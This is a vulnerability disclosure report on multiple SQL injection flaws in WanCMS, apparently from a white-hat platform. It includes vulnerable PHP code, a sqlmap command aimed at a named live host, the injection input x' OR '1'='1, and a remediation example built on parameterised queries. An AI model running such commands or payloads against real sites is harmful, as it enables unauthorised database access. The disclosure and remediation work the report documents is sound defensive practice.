2014-01-26: Details sent to the vendor, awaiting vendor handling
2014-01-28: Vendor confirmed; details disclosed to the vendor only
2014-01-31: Details opened to third-party security partners
2014-03-24: Details disclosed to core white hats and experts in related fields
2014-04-03: Details disclosed to regular white hats
2014-04-13: Details disclosed to intern white hats
2014-04-26: Details disclosed to the public

WanCMS: multiple SQL injections. The injection has been demonstrated on the official site and can leak the contents of every database (the demonstration stops at enumerating table names, which is enough). One case is analysed below and a general fix is suggested.
Example analysis: /app/Lib/Action/AccountsAction.class.php line:570

// earlier code omitted; this is inside public function forget_password_s()
$username = $_GET['username']; // reads username straight from $_GET: why not use the framework's wrapper method?
$ucresult = uc_user_checkname($username);
if ($ucresult != '-3') {
    // Header("Location: /accounts/forget_password");
} // left over from testing? it does nothing
$this->assign('username', $username);
$member = M('member');
$u_info = $member->where("username ='" . $username . "'")->find(); // username is concatenated straight into the query: this is the injection
$this->assign('u_info', $u_info);
$this->assign('username', $username);
// later code omitted, not relevant to this vulnerability
Another injection point: /app/Lib/Action/LicenseAction.class.php, within the first few lines

public function search() {
    $domain = $_GET['domain'];
    $authorization = M("authorization"); // instantiate the authorization model
    $info = $authorization->where("domain ='" . $domain . "'")->find(); // $domain concatenated straight into the query
    if (empty($info)) {
        echo "document.write('<a href='http://demo.31wan.cn/license/'>未授权</a>')"; // "未授权" = unauthorized
    } else {
        echo "document.write('已授权')"; // "已授权" = authorized
    }
}
Again a GET parameter goes straight into the query statement; the same pattern every time. There are many more injections like this, so I will not submit them one by one. Below, sqlmap is used to enumerate tables; only some table names are listed, but in principle all the information could be retrieved.

Demo:

C:\Users\Administrator>sqlmap.py -u "http://test4.31wan.cn/accounts/forget_password_s?username=lxj616" --tables
Use the security functions that ship with your own framework

/**
 +----------------------------------------------------------
 * If magic_quotes_gpc is off, this function escapes the string
 +----------------------------------------------------------
 * @access public
 +----------------------------------------------------------
 * @param string $string the string to process
 +----------------------------------------------------------
 * @return string
 +----------------------------------------------------------
 */
static public function addSlashes($string) {
    if (!get_magic_quotes_gpc()) {
        $string = addslashes($string);
    }
    return $string;
}

/**
 +----------------------------------------------------------
 * Fetches data from the $_POST, $_GET, $_COOKIE, $_REQUEST arrays
 +----------------------------------------------------------
 * @access public
 +----------------------------------------------------------
 * @param string $string the string to process
 +----------------------------------------------------------
 * @return string
 +----------------------------------------------------------
 */
static public function getVar($string) {
    return Input::stripSlashes($string);
}

/**
 +----------------------------------------------------------
 * If magic_quotes_gpc is on, this function un-escapes the string
 +----------------------------------------------------------
 * @access public
 +----------------------------------------------------------
 * @param string $string the string to process
 +----------------------------------------------------------
 * @return string
 +----------------------------------------------------------
 */
static public function stripSlashes($string) {
    if (get_magic_quotes_gpc()) {
        $string = stripslashes($string);
    }
    return $string;
}
Example: patching the first injection point

// addSlashes is a static method of the framework's Input class, so it must be called as Input::addSlashes
$username = Input::addSlashes($_GET['username']);
// ... from here on, every value that reaches the database has been through addSlashes ...
// when the value needs to be output (API, display, or wherever the raw data is required):
$username_out = Input::stripSlashes($username);

It is recommended to audit the code carefully for similar injection points and fix them in a sound way (the method above is for reference only).
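The following is an added example, not WanCMS or ThinkPHP code: it reproduces the concatenated where() pattern from forget_password_s() beside a hardened version that binds the value as a parameter, against an in-memory SQLite table with two constructed rows. With the constructed input the vulnerable query returns every member row while the hardened one returns none; the table name, columns and rows are assumptions for the demonstration.

```php
<?php
// Added example (not the vendor's code). Uses PDO + SQLite so it runs stand-alone.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed stand-in for the real `member` table.
$db->exec("CREATE TABLE member (id INTEGER PRIMARY KEY, username TEXT, email TEXT)");
$db->exec("INSERT INTO member (username, email) VALUES
           ('lxj616', 'lxj616@example.invalid'),
           ('admin',  'admin@example.invalid')");

// Vulnerable: the same string concatenation as the page's where() call.
// Whatever the client sends becomes part of the SQL text.
function find_member_vulnerable(PDO $db, string $username): array
{
    $sql = "SELECT * FROM member WHERE username ='" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: a bound parameter. The driver sends the value separately from
// the statement, so quotes in the input can never change the query's shape.
function find_member_safe(PDO $db, string $username): array
{
    $stmt = $db->prepare("SELECT * FROM member WHERE username = :u");
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: a quote closes the string literal and appends an
// always-true predicate, the same class of input sqlmap detected above.
$input = "x' OR '1'='1";

$leaked = find_member_vulnerable($db, $input);
$safe   = find_member_safe($db, $input);

printf("vulnerable query returned %d row(s)\n", count($leaked)); // all members, no username matched
printf("hardened query returned %d row(s)\n", count($safe));     // none: the input is compared literally

// A legitimate lookup still works through the hardened path.
printf("hardened lookup of lxj616 returned %d row(s)\n", count(find_member_safe($db, 'lxj616')));
```

In ThinkPHP the equivalent of the hardened path is to pass the condition as an array, `where(array('username' => $username))`, so the framework quotes the value itself rather than the caller building SQL text (stated here as the editor's recommendation, not from the original report).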
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2014-01-28 13:46
The vendor will fix it as soon as possible. Sincere thanks to lxj616
None